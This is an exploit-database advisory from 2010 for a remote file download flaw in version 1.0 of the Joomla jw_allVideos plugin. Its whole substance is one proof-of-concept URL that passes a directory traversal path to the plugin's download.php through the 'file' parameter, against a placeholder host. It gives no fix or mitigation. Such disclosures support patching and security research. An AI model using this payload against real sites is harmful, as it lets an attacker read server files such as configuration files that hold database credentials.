id: 10894
date: 02/14/2010
title: Joomla (Jw_allVideos) Remote File Download Vulnerability
author: Pouya Daneshmand
cves: 

========================================================
Joomla (Jw_allVideos) Remote File Download Vulnerability
========================================================

#################################################################
# Application Info:
# Name: Joomla (jw_allvideos Plugin)
# Version: 1.0
#################################################################
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
#################################################################
# Vulnerability:
# http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php
#################################################################



#  0day.today [2023-03-26]  #